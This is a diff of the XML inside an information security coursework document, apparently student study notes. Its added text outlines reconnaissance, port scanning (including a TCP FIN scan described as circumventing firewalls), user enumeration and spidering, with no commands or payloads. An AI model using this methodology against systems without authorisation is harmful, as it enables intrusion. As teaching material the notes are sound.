--- a/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
+++ b/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
@@ -145,7 +145,7 @@
                                                     <pic:cNvPicPr/>
                                                   </pic:nvPicPr>
                                                   <pic:blipFill>
-                                                    <a:blip r:embed="rId7" cstate="print">
+                                                    <a:blip r:embed="rId8" cstate="print">
                                                       <a:extLst>
                                                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -447,7 +447,7 @@
                                               <pic:cNvPicPr/>
                                             </pic:nvPicPr>
                                             <pic:blipFill>
-                                              <a:blip r:embed="rId7" cstate="print">
+                                              <a:blip r:embed="rId8" cstate="print">
                                                 <a:extLst>
                                                   <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                     <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -691,8 +691,12 @@
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:b/>
           <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:id w:val="-1685355400"/>
         <w:docPartObj>
@@ -702,13 +706,9 @@
       </w:sdtPr>
       <w:sdtEndPr>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:bCs/>
           <w:noProof/>
           <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:sdtEndPr>
       <w:sdtContent>
@@ -742,7 +742,9 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -754,7 +756,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc441699416" w:history="1">
+          <w:hyperlink w:anchor="_Toc444877079" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -781,7 +783,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc441699416 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc444877079 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -819,16 +821,87 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc444877080" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Method</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc444877080 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc441699417" w:history="1">
+          <w:hyperlink w:anchor="_Toc444877081" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>Implementation</w:t>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>Reconnaissance</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -849,7 +922,144 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc441699417 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc444877081 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc444877082" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>Scanning</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc444877082 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc444877083" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Scanning System Vulnerabilities</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc444877083 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -887,16 +1097,18 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc441699418" w:history="1">
+          <w:hyperlink w:anchor="_Toc444877084" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Results</w:t>
+              <w:t>Conclusion</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -917,7 +1129,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc441699418 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc444877084 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -937,75 +1149,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
-            </w:tabs>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc441699419" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>Conclusion</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc441699419 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>2</w:t>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1050,13 +1194,11 @@
       <w:pPr>
         <w:pStyle w:val="Title"/>
         <w:rPr>
-          <w:b/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:b/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
@@ -1074,110 +1216,811 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc444877079"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Introduction</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc444877080"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>Method</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="1"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc444877081"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Reconnaissance</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
           <w:b/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc441699416"/>
-      <w:r>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:b/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>Introduction</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:b/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc441699417"/>
-      <w:r>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Tools:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>who.is</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>w3dt.net</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="45"/>
         <w:rPr>
           <w:b/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>Implementation</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="1"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:b/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc441699418"/>
-      <w:r>
+        </w:rPr>
+        <w:t>OS Based Tools:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nslookup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc444877082"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Scanning</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:b/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>Results</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="2"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc441699419"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>Conclusion</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="3"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Accessibility</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Which IP addresses are </w:t>
+      </w:r>
+      <w:r>
+        <w:t>accessible</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>What they are running</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Any obviously open doors</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="405"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="45"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Basics:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Ping the address to see if it’ live.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Scan the ports to see if are any are open</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Google ports numbers to get applications</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Google applications vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">1-1023 are </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>system</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: used by the OS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">1024-49151 are </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>registered</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> for a specific purpose</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">49152-65535 are </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>custom</w:t>
+      </w:r>
+      <w:r>
+        <w:t>; used for whatever the user wants.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Can just try and establish a TCP connection to the port:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Gives the system your IP address, details of the program used to connect, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ect</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>use sneaky manipulation of TCP protocol</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Send a TCP FIN Packet</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Does not make a connection attempt; circumvents firewall.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>If the port is in listen: no reply.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>If the port is closed: responds with reset.</w:t>
+      </w:r>
     </w:p>
     <w:p/>
-    <w:p>
-      <w:pPr>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="405"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Enumeration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The process of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>validating the list</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>of users you acquired when foot-printing</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>The evaluation of how safe it is to go ahead with the attack.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A lengthy process that is usually automated. A case of measure twice and cut once.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="45"/>
         <w:rPr>
           <w:b/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
-        </w:rPr>
-        <w:t>Notes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>LAMP architecture is made up of LINUX, APACHE, MySQL database management and PHP.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Version of PHP installed - phpBB2.0.23</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Local </w:t>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Spidering</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Spidering</w:t>
+      </w:r>
